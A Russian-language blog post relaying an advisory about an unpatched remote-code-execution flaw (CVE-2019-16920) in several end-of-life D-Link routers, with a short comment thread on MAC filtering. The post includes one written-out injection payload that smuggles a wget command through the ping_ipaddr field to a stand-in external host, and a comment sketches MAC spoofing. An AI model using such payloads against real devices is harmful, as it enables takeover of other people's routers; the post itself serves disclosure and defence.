qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
qkowlew ([personal profile] qkowlew) wrote2019-10-13 04:27 pm

Уязвимость в массовых роутерах D-Link нескольких моделей. Исправлять не будут.

В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".

Наличие уязвимости официально подтверждено в моделях:

  • DIR-655 с прошивкой 3.02b05 или старее;
  • DIR-866L с прошивкой 1.03b04 или старее;
  • DIR-1565 с прошивкой 1.01 или старее;
  • DIR-652 (данных о версиях проблемных прошивок не приводится)
Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что не будет выпускать для них обновления с устранением уязвимости, не рекомендует использовать и советует заменить на новые устройства. В качестве обходного пути защиты можно ограничить доступ к web-интерфейсу только для заслуживающих доверия IP-адресов.

Позднее выяснилось, что уязвимость также затрагивает модели DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, о планах по выпуску обновлений для которых пока ничего не известно.

Отсюда
по этому материалу

kobelsky: (Default)

[personal profile] kobelsky 2019-10-13 01:48 pm (UTC)(link)
Ну тут ведь как... Поскольку я сейчас живу в ГЗ МГУ, то даже к программному роутеру у меня можно обратиться по wi-fi только с одной комбинации IP+MAC ;-)))
dmarck: (Default)

[personal profile] dmarck 2019-10-13 04:00 pm (UTC)(link)
а если эта комбинация станет недоступна? ;)

уж по крайней мере backup пару надо б иметь
kobelsky: (Default)

[personal profile] kobelsky 2019-10-13 09:36 pm (UTC)(link)
А это и есть backup. Потому что нормальная сеть у меня проводная ;-)))
dmarck: (Default)

[personal profile] dmarck 2019-10-13 10:04 pm (UTC)(link)
тогда жорошо™ ;-)

(ох, как же всё-таки печалят тенденции "уровня заинтересованности", если угодно -- but that's totally different story)
vitus_wagner: My photo 2005 (Default)

[personal profile] vitus_wagner 2019-10-13 06:11 pm (UTC)(link)
Можно подумать это кого-то остановит.
В наше время мак-адрес не меняет только ленивый. И даже ленивый, если использует усторойство с IOS или достаточно свежим Android, при каждом подключении использует новый, случайным образом
сгенерированный MAC-адрес.

Поэтому заснифить какой мак-адрес используешь ты, и дождавшись твоего отсутствия зайти с таким же - это первое, что придел в голову любому хакеру-недоучке.
kobelsky: (Default)

[personal profile] kobelsky 2019-10-13 09:40 pm (UTC)(link)
И сетификат тоже заснифит? Очень вряд ли.
Тем более, как я уже genosse Морозовскому ответил, доступ по wi-fi с ноута для меня аварийный вариант, я все-таки живу на десктопе и с каблом.